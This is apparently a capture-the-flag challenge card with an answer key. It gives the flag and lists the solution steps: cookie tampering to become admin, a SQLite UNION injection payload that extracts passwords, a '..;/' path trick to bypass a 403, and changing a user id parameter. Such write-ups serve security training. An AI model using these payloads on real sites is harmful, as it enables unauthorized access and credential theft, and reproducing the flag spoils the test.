One-for-all
One for all or all for one?
6/10
PCTF{Hang_l00s3_and_Adm1t_ev3rYtH1nG}
N/A
Kiran Ghimire
Tested by <>
The flag is divided into four parts.
- Change cookie value to admin of key name
- SQlite injection in user name field
- Query: 4180" UNION ALL SELECT 1,2,3,group_concat(password) from accounts--
- 403 bypass: "/secretsforyou/..;/"
- Change id to 0: /user?id=0